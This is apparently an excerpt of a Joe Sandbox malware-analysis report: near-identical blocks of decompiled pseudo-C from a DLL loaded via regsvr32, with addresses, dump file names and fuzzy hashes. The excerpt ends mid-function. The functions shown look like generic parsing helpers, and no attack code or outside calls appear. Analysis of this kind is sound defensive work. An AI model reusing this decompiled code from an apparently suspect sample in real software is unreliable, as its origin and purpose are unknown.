                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019a07;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80019ad6;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019a48;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019ad8;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80019ac8;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80019a84;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80019ad8;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80019a7c;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019a7f;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x1800199dc
                                                                      0x1800199ed
                                                                      0x1800199f0
                                                                      0x1800199f2
                                                                      0x1800199f7
                                                                      0x1800199ff
                                                                      0x180019a02
                                                                      0x180019a11
                                                                      0x180019a13
                                                                      0x180019a19
                                                                      0x180019a1c
                                                                      0x180019a21
                                                                      0x180019a25
                                                                      0x180019a2c
                                                                      0x180019a32
                                                                      0x180019a37
                                                                      0x180019a3c
                                                                      0x180019a43
                                                                      0x180019a53
                                                                      0x180019a55
                                                                      0x180019a5f
                                                                      0x180019a64
                                                                      0x180019a6c
                                                                      0x180019a6e
                                                                      0x180019a74
                                                                      0x180019a79
                                                                      0x180019a7c
                                                                      0x180019a82
                                                                      0x180019a84
                                                                      0x180019a88
                                                                      0x180019a8e
                                                                      0x180019a98
                                                                      0x180019a9a
                                                                      0x180019a9e
                                                                      0x180019aa1
                                                                      0x180019aa8
                                                                      0x180019aac
                                                                      0x180019ab3
                                                                      0x180019ab7
                                                                      0x180019abc
                                                                      0x180019ac1
                                                                      0x180019ac6
                                                                      0x180019ad3
                                                                      0x180019ae2

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction ID: a1ca72155b49c2f9bcef6681242c5be840dca892499cd0c8932f71657a6c07c1
                                                                      • Opcode Fuzzy Hash: 2a0f4c06c7b69a6edecd4e4a36eef33ec24a95d27793fc4b6df5962808d937b7
                                                                      • Instruction Fuzzy Hash: 8331C072205B48C6EBA18F69E0403AD77A0F78DB8CF648125EB4C0B750CF36C55AC745
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800239F4(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed long long _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed long long* _t72;
                                                                      				signed long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80023a1f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8);
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80023aeb;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80023a60;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x80023aed;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80023ade;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80023a9a;
                                                                      				 *_t72 = 1;
                                                                      				_t72[0] = r9b;
                                                                      				_t72[2] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x80023aed;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E00000001180015A5C(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80023a92;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80023a95;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x1800239f4
                                                                      0x1800239f4
                                                                      0x180023a05
                                                                      0x180023a08
                                                                      0x180023a0a
                                                                      0x180023a0f
                                                                      0x180023a13
                                                                      0x180023a17
                                                                      0x180023a1a
                                                                      0x180023a29
                                                                      0x180023a2b
                                                                      0x180023a31
                                                                      0x180023a34
                                                                      0x180023a39
                                                                      0x180023a3d
                                                                      0x180023a44
                                                                      0x180023a4a
                                                                      0x180023a4f
                                                                      0x180023a54
                                                                      0x180023a5b
                                                                      0x180023a6b
                                                                      0x180023a6d
                                                                      0x180023a77
                                                                      0x180023a7b
                                                                      0x180023a83
                                                                      0x180023a85
                                                                      0x180023a8b
                                                                      0x180023a8f
                                                                      0x180023a92
                                                                      0x180023a98
                                                                      0x180023a9a
                                                                      0x180023a9e
                                                                      0x180023aae
                                                                      0x180023ab0
                                                                      0x180023ab4
                                                                      0x180023ab7
                                                                      0x180023abe
                                                                      0x180023ac2
                                                                      0x180023ac9
                                                                      0x180023acd
                                                                      0x180023ad2
                                                                      0x180023ad7
                                                                      0x180023adc
                                                                      0x180023ae8
                                                                      0x180023af7

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f4041893800844f058aa962969b618e28f2d371797e4ab8b6e3bae5d763334c
                                                                      • Instruction ID: 45e33c794be19c74eece3bbca7f20f0f311fdacbea725bee23a5f56116ec4432
                                                                      • Opcode Fuzzy Hash: 8f4041893800844f058aa962969b618e28f2d371797e4ab8b6e3bae5d763334c
                                                                      • Instruction Fuzzy Hash: 06319372214B488AEB628F29D0413AD77A0F38DF8CF158125DB8D4B751DF36C596CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180025AA4(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed long long _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed long long* _t72;
                                                                      				signed long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80025acf;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8);
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80025b9b;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80025b10;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x80025b9d;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80025b8e;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80025b4a;
                                                                      				 *_t72 = 1;
                                                                      				_t72[0] = r9b;
                                                                      				_t72[2] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x80025b9d;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E0000000118000E818(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80025b42;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80025b45;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x180025aa4
                                                                      0x180025aa4
                                                                      0x180025ab5
                                                                      0x180025ab8
                                                                      0x180025aba
                                                                      0x180025abf
                                                                      0x180025ac3
                                                                      0x180025ac7
                                                                      0x180025aca
                                                                      0x180025ad9
                                                                      0x180025adb
                                                                      0x180025ae1
                                                                      0x180025ae4
                                                                      0x180025ae9
                                                                      0x180025aed
                                                                      0x180025af4
                                                                      0x180025afa
                                                                      0x180025aff
                                                                      0x180025b04
                                                                      0x180025b0b
                                                                      0x180025b1b
                                                                      0x180025b1d
                                                                      0x180025b27
                                                                      0x180025b2b
                                                                      0x180025b33
                                                                      0x180025b35
                                                                      0x180025b3b
                                                                      0x180025b3f
                                                                      0x180025b42
                                                                      0x180025b48
                                                                      0x180025b4a
                                                                      0x180025b4e
                                                                      0x180025b5e
                                                                      0x180025b60
                                                                      0x180025b64
                                                                      0x180025b67
                                                                      0x180025b6e
                                                                      0x180025b72
                                                                      0x180025b79
                                                                      0x180025b7d
                                                                      0x180025b82
                                                                      0x180025b87
                                                                      0x180025b8c
                                                                      0x180025b98
                                                                      0x180025ba7

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f4041893800844f058aa962969b618e28f2d371797e4ab8b6e3bae5d763334c
                                                                      • Instruction ID: 0b86135c0cb0bfe348ca961af6063ffb3386d2c90ed5b65d9479aef99137d9c6
                                                                      • Opcode Fuzzy Hash: 8f4041893800844f058aa962969b618e28f2d371797e4ab8b6e3bae5d763334c
                                                                      • Instruction Fuzzy Hash: E331A472204B4886EB628F29D0903AD77A0F38DB8CF148115EB8D4B751CF36C556DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180023AF8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80023b23;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80023bf0;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80023b64;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80023bf2;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80023be2;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80023b9e;
                                                                      				 *_t72 = 2;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80023bf2;
                                                                      				_v24 = _t44;
                                                                      				r8d = 2;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80023b96;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80023b99;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180023af8
                                                                      0x180023b09
                                                                      0x180023b0c
                                                                      0x180023b0e
                                                                      0x180023b13
                                                                      0x180023b1b
                                                                      0x180023b1e
                                                                      0x180023b2d
                                                                      0x180023b2f
                                                                      0x180023b35
                                                                      0x180023b38
                                                                      0x180023b3d
                                                                      0x180023b41
                                                                      0x180023b48
                                                                      0x180023b4e
                                                                      0x180023b53
                                                                      0x180023b58
                                                                      0x180023b5f
                                                                      0x180023b6f
                                                                      0x180023b71
                                                                      0x180023b7b
                                                                      0x180023b7f
                                                                      0x180023b87
                                                                      0x180023b89
                                                                      0x180023b8f
                                                                      0x180023b93
                                                                      0x180023b96
                                                                      0x180023b9c
                                                                      0x180023b9e
                                                                      0x180023ba2
                                                                      0x180023ba8
                                                                      0x180023bb2
                                                                      0x180023bb4
                                                                      0x180023bb8
                                                                      0x180023bbb
                                                                      0x180023bc2
                                                                      0x180023bc6
                                                                      0x180023bcd
                                                                      0x180023bd1
                                                                      0x180023bd6
                                                                      0x180023bdb
                                                                      0x180023be0
                                                                      0x180023bed
                                                                      0x180023bfc

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bd059c2c92f8d116967229523164a63b15a488009e00b8dca9b07384135939d4
                                                                      • Instruction ID: 129edc1b09be79ba960638824e8c93af77402cd943489ea0edfc329e3b78783e
                                                                      • Opcode Fuzzy Hash: bd059c2c92f8d116967229523164a63b15a488009e00b8dca9b07384135939d4
                                                                      • Instruction Fuzzy Hash: 08319172214B88C6EB628F29D4423AD7BA0F39DF88F258125EB8D0B751CF36C556CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180025BA8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80025bd3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80025ca0;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80025c14;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80025ca2;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80025c92;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80025c4e;
                                                                      				 *_t72 = 2;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80025ca2;
                                                                      				_v24 = _t44;
                                                                      				r8d = 2;
                                                                      				_t69 = _t65;
                                                                      				if (E0000000118000E818(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80025c46;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80025c49;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180025ba8
                                                                      0x180025bb9
                                                                      0x180025bbc
                                                                      0x180025bbe
                                                                      0x180025bc3
                                                                      0x180025bcb
                                                                      0x180025bce
                                                                      0x180025bdd
                                                                      0x180025bdf
                                                                      0x180025be5
                                                                      0x180025be8
                                                                      0x180025bed
                                                                      0x180025bf1
                                                                      0x180025bf8
                                                                      0x180025bfe
                                                                      0x180025c03
                                                                      0x180025c08
                                                                      0x180025c0f
                                                                      0x180025c1f
                                                                      0x180025c21
                                                                      0x180025c2b
                                                                      0x180025c2f
                                                                      0x180025c37
                                                                      0x180025c39
                                                                      0x180025c3f
                                                                      0x180025c43
                                                                      0x180025c46
                                                                      0x180025c4c
                                                                      0x180025c4e
                                                                      0x180025c52
                                                                      0x180025c58
                                                                      0x180025c62
                                                                      0x180025c64
                                                                      0x180025c68
                                                                      0x180025c6b
                                                                      0x180025c72
                                                                      0x180025c76
                                                                      0x180025c7d
                                                                      0x180025c81
                                                                      0x180025c86
                                                                      0x180025c8b
                                                                      0x180025c90
                                                                      0x180025c9d
                                                                      0x180025cac

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bd059c2c92f8d116967229523164a63b15a488009e00b8dca9b07384135939d4
                                                                      • Instruction ID: a2e91597c02971e9ab1fa23f568674dbda4efe9184306d74c85f78da5f6250a8
                                                                      • Opcode Fuzzy Hash: bd059c2c92f8d116967229523164a63b15a488009e00b8dca9b07384135939d4
                                                                      • Instruction Fuzzy Hash: 3B31A272214B88CAEB668F29D4403AD7BA0F39DB8CF258125DB8C4B355DF36C596C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180023C00(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80023c2b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80023cf8;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80023c6c;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
